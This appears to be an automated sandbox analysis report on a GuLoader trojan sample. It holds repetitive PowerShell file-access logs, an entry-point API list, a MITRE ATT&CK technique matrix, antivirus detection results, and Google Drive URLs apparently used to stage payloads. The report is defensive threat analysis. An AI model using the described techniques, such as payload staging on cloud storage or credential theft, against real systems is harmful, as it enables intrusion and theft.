      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\Cpfkf79Rzk.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping211
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Shared Modules      		Boot or Logon Initialization Scripts411
      Process Injection      		31
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      PowerShell      		Logon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets2
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing      		Cached Domain Credentials114
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Cpfkf79Rzk.exe55%ReversingLabsWin32.Trojan.Guloader
      Cpfkf79Rzk.exe71%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Kvababbelser58.exe55%ReversingLabsWin32.Trojan.Guloader

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://drive.usercoEm0%Avira URL Cloudsafe
      https://drive.userconte0%Avira URL Cloudsafe
      https://drive.userco0%Avira URL Cloudsafe
      https://drive.usercontent.google.com;0%Avira URL Cloudsafe
      https://www.google.comG0%Avira URL Cloudsafe
      https://drive.usercontent.go0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      s-part-0017.t-0009.t-msedge.net
      		13.107.246.45
      		truefalse
        		high
        drive.google.com
        		216.58.206.46
        		truefalse
          		high
          drive.usercontent.google.com
          		142.250.181.225
          		truefalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://drive.google.com/rityKvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.usercoKvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://drive.google.com/rcontent.google.com/download?iKvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/rKvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://www.microsoft.copowershell.exe, 00000002.00000002.2069318942.0000000008212000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://contoso.com/Licensepowershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://drive.userconteKvababbelser58.exe, 00000007.00000003.2389230849.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.0000000005504000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://drive.google.com/LocalKvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://drive.google.com/ogleQKvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.google.comKvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2060046848.0000000004A41000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
